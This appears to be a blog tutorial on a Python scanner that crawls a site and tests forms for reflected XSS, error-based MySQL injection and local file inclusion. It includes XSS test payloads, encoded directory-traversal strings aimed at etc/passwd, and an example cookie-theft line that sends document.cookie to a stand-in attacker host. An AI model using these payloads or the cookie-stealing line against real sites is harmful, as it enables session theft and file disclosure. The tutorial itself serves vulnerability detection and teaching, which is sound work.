Modern web applications, if not sufficiently protected through various mitigating factors, are potentially vulnerable to a wide variety of exploitation techniques. The full list is quite large, and this post will only discuss the detection of three basic vulnerability types: Error-Based MySQL Injection, Reflected Cross-Site Scripting (R-XSS) and Local File Inclusion (LFI). Additionally, the Python script used here depends on two third-party modules to simplify request generation and HTML parsing: BeautifulSoup4 and Requests make interacting with web resources far simpler than manual interaction. Links to both are included at the bottom of this post.
The first stage of scanning for vulnerabilities is being able to crawl a given site effectively without going out of scope. The script's crawling depth is customizable; it attempts to find links on every sequentially discovered page and then performs additional crawling on each discovered link. The main portion of the function for crawling a given host is shown below.
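Since the crawler itself is only described here, the following is a minimal sketch of what such a function might look like; the name 'crawl', the 'link_list' variable and the depth handling follow the description in this post, though the actual script may differ in its details.

import requests
from bs4 import BeautifulSoup
from urllib.parse import urlparse, urljoin

link_list = []

def crawl(host, depth):
    # Stop once the user-specified crawl depth has been exhausted
    if depth <= 0:
        return
    # Establish the base domain so the crawl never leaves scope
    base_domain = urlparse(host).netloc
    try:
        response = requests.get(host, timeout=10)
    except requests.RequestException:
        return
    # Parse the HTTP response and pull out every anchor on the page
    soup_init = BeautifulSoup(response.text, 'html.parser')
    for anchor in soup_init.find_all('a', href=True):
        link = urljoin(host, anchor['href'])
        # Skip links pointing outside the base domain (e.g. an embedded YouTube link)
        if urlparse(link).netloc != base_domain:
            continue
        # Only previously unseen links are appended and crawled further
        if link not in link_list:
            link_list.append(link)
            crawl(link, depth - 1)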
The above function takes a 'host' as input and establishes a 'base_domain' to ensure that links outside the base domain path are not scanned. This prevents the scan from going out of scope, for example by crawling YouTube just because the target site happens to link to it. 'requests.get(host)' is a convenience function from the 'requests' module which issues a properly formed HTTP GET request to the target, and the following 'soup_init' parses the HTTP response using BeautifulSoup4; BS4 is also used to extract all links present in the response. Links are iterated through and new requests are issued for each discovered target, continuing until the depth specified in the user arguments is reached. Any link not already present in 'link_list[]' is appended to the end of that list; this list is iterated through by the later vulnerability scanning functions and acts as the source of target hosts.
Reflected XSS typically results from a lack of input or output sanitization on the server side, creating the potential for JavaScript to be echoed back to the client on vulnerable web pages. An example would be a site with a login form that echoes the username back after a failed or successful login attempt. If such a site does not properly use XSS protection headers and sanitize allowed input, the strings echoed back to the client could include malicious JavaScript. A basic payload commonly used to test for reflected XSS is JavaScript of the form 'alert("Test")', which if successful results in a pop-up appearing on the client containing the text 'Test'. A malicious attacker will typically craft a link containing JavaScript with commands such as 'document.location='http://attacker-website/cookie-theft.php?cookie='+document.cookie;'. This JavaScript would be embedded in a seemingly innocuous link and sent to the victim, who would then unwittingly send their current session cookie to the attacker's pre-determined PHP script.
The script can iterate through the links discovered by the crawling function and test each of them for potential reflected XSS injections via dynamic form discovery, form population and response analysis. The main code bootstrapping this functionality is shown below.
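As an approximation of that bootstrap code, the loop below hands every crawled link to 'xss_test()' and writes a mini-report of the results; the report file name 'xss_report.txt' is an assumption for illustration.

# Inside main(): test every crawled link and record the results
with open('xss_report.txt', 'w') as report:
    for host in link_list:
        findings = xss_test(host)
        report.write('Host: %s\n' % host)
        if findings:
            for finding in findings:
                report.write('    Potential reflected XSS: %s\n' % finding)
        else:
            report.write('    No reflected XSS detected\n')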
The above code is part of the 'main' function and iterates through the host URIs in 'link_list', which was previously populated by the crawling portion of the script. Once a given host has been tested, a mini-report is generated and written to a file, recording the results of all XSS tests and letting investigators know which ones resulted in the detection of a potential reflected-XSS vulnerability. As shown above, each host is passed to the 'xss_test()' function as an argument; snippets from 'xss_test' are given below.
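A sketch of that initial portion of 'xss_test()' (imports as in the crawler sketch, with a 'potential_xss' list used here to record findings) might look roughly like this:

def xss_test(host):
    # Baseline request used for form discovery on the target page
    initial_response = requests.get(host)
    potential_xss = []    # requests/payloads that produced a potential reflection

    # Read the candidate XSS payloads, one per line
    with open('xss.txt') as payload_file:
        payloads = [line.strip() for line in payload_file if line.strip()]

    # Locate every HTML form on the page for later population and submission
    soup = BeautifulSoup(initial_response.text, 'html.parser')
    all_forms = soup.find_all('form')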
The code portion above represents the initial setup for reflected XSS testing: it takes a host argument, sends an initial request to establish a baseline for form analysis, and initializes a list for recording payloads and requests that result in potential XSS findings. A file named 'xss.txt' is also opened and read line by line; this file contains candidate payloads for XSS vulnerability detection. The script then attempts to find all HTML forms present on the page, again using BS4 to parse the HTTP response, and stores the forms in a variable for later iteration. A snippet of the payloads document as it currently exists is shown below.
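The exact contents of 'xss.txt' are not reproduced here, but representative entries built around the 'alert("Test")' pattern would look something like:

<script>alert("Test")</script>
"><script>alert("Test")</script>
'><script>alert("Test")</script>
<img src=x onerror=alert("Test")>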
After loading the available payloads, the script iterates through each payload, then through each form, and finally through each key within that form, in a nested for-loop fashion. This is relatively inefficient, but it does provide good overall coverage of every payload, form and key combination per submission. A sample of the next part of the script is shown below, existing within the outer payload-iteration loop.
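Continuing inside 'xss_test()', the nested iteration and the 'form_data' dictionary described next might be sketched as follows:

# Still inside xss_test(): outer loop over payloads, then over every discovered form
for payload in payloads:
    for form in all_forms:
        # Where and how the form submits
        action = form.get('action')
        method = (form.get('method') or 'get').lower()
        target = urljoin(host, action) if action else host

        # Original name:value pairs for every input element in the form
        form_data = {}
        for field in form.find_all('input'):
            name = field.get('name')
            if name:
                form_data[name] = field.get('value', '')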
As seen above, each form present in 'all_forms' is processed. This script originally sought out login forms specifically, but a more recent iteration includes all forms in order to achieve wider overall site coverage. The script then retrieves the action, method and available inputs of the form in question and builds a dictionary of key:value pairs holding the original names and values of all form elements, stored as 'form_data'. For every form, a final nested for loop iterates through all keys present in the form, sets the corresponding value to the current payload, and forces a form submission in order to analyze the response. This section is shown below.
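A sketch of that innermost loop for GET-action forms, sitting inside the payload and form loops above, might look like this:

# Innermost loop (still inside the payload and form loops above)
for key in form_data:
    form_data_modded = dict(form_data)   # copy so the original form data can be reused
    form_data_modded[key] = payload      # inject the current payload into this field

    if method == 'get':
        response = requests.get(target, params=form_data_modded)
        # If the payload is echoed back unmodified, record the URL as a potential trigger
        if payload in response.text:
            potential_xss.append(response.url)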
The above code snippet represents the main portion of XSS testing for GET-action forms. A new dictionary named 'form_data_modded' is created as a copy of the original 'form_data' so that the original is not altered and can be reused later. For each key:value pair in 'form_data', the keys are iterated through and the corresponding value is set to the payload currently under test. A GET/POST request is then made with the modified parameters and the HTTP response is analyzed for the presence of the embedded JavaScript; if detected, the URL which generated the reflection is appended to the list of potential XSS triggers. Otherwise, the next key:value pair is tested and the script continues in either case. An example demonstrating this in action is shown below. POST-action forms are handled very similarly, directly below within the same for loop, as sketched next.
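The POST-action branch is not reproduced in full here, but it mirrors the GET case, submitting the modified data in the request body instead of the query string:

# POST-action branch, mirroring the GET case above
if method == 'post':
    response = requests.post(target, data=form_data_modded)
    if payload in response.text:
        # Record the form target and the field/payload pair that triggered the reflection
        potential_xss.append('%s [%s=%s]' % (target, key, payload))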
The above code runs until all payloads, forms and key:value pairs have been iterated through, and then continues on to every host present in 'link_list'. The SQL testing is very similar in nature and also uses a text file containing pre-built SQL payloads intended to test for error-based MySQL injection. Additionally, a list of 'special' characters and known error strings is specified in code. The special character list consists of items such as '/', ';', ')', '(', '-- ' and many more, which are dynamically combined with each payload as prefixes and suffixes in order to test a variety of payload combinations. As with the XSS tests, detected key:value pairs are iterated through and the generated payloads are inserted into every value possible in every detected form in order to gain full application coverage. Posting code snippets of the SQL test would not be efficient due to their similarity, but they can be viewed in the source code linked towards the end of this post; a small illustrative sketch of the prefix/suffix combination idea is given below instead, along with examples of both SQL injection failure and detection.
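The sketch below shows roughly how such prefix/suffix combinations might be generated and how a response could be checked against known MySQL error strings; the character and error lists shown are representative examples rather than the script's actual lists.

# Representative special characters and MySQL error strings (illustrative, not the full lists)
special_chars = ["'", '"', '/', ';', ')', '(', '-- ']
known_errors = ['You have an error in your SQL syntax',
                'Warning: mysql_fetch',
                'supplied argument is not a valid MySQL']

def build_sql_payloads(raw_payloads):
    # Wrap every raw payload with each prefix/suffix pair to widen coverage
    combos = []
    for payload in raw_payloads:
        for prefix in special_chars:
            for suffix in special_chars:
                combos.append(prefix + payload + suffix)
    return combos

def looks_like_sql_error(response_text):
    # Error-based detection: any known database error string in the response
    return any(error in response_text for error in known_errors)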
The final mechanism included in the script is a test for Local File Inclusion. This test is slightly separate from the others, as it does not yet integrate with the crawling element; that will be added in a future update. Currently, input for LFI testing must be in the form 'http://URL.php?page='. The script detects the parameter lacking a value and then begins injecting into that parameter using combinations of variably encoded double-dots ('..') and slashes taken from two separate text files. Every encoding of the double-dot is tried with every type of slash available in the given lists, down to a depth of five traversals. A request is made for each attempt and the HTTP response is analyzed to determine whether 'etc/passwd' appears in the response, the presence of which would indicate that a successful local file inclusion has occurred. It is a relatively naive and inefficient implementation, but it does succeed in testing for LFI vulnerabilities against known GET parameters. A list of the currently used double-dots and slashes is given below, along with an example of a successful LFI detection in operation.
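Representative entries for those two lists and a sketch of the traversal loop are shown below; the 'root:x:0:0' marker used here to spot /etc/passwd content in the response is an assumption for illustration.

import requests

# Representative encodings read from the two text files (illustrative, not exhaustive)
dots = ['..', '%2e%2e', '%252e%252e', '.%2e']
slashes = ['/', '%2f', '%252f', '\\', '%5c']

def lfi_test(url):
    # Expects a bare GET parameter, e.g. http://target/index.php?page=
    findings = []
    for dot in dots:
        for slash in slashes:
            for depth in range(1, 6):
                traversal = (dot + slash) * depth + 'etc' + slash + 'passwd'
                response = requests.get(url + traversal)
                # Tell-tale /etc/passwd content suggests a successful inclusion
                if 'root:x:0:0' in response.text:
                    findings.append(url + traversal)
    return findings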
Overall, this script performs poorly, but it does manage to detect the given vulnerabilities on sites which are vulnerable to them. Hopefully this helps demonstrate some basic ways in which these classes of vulnerabilities can be detected, and furthers overall knowledge on the topic for those who are curious.
HTTP Requests : http://docs.python-requests.org/en/master/
Beautiful Soup : https://www.crummy.com/software/BeautifulSoup/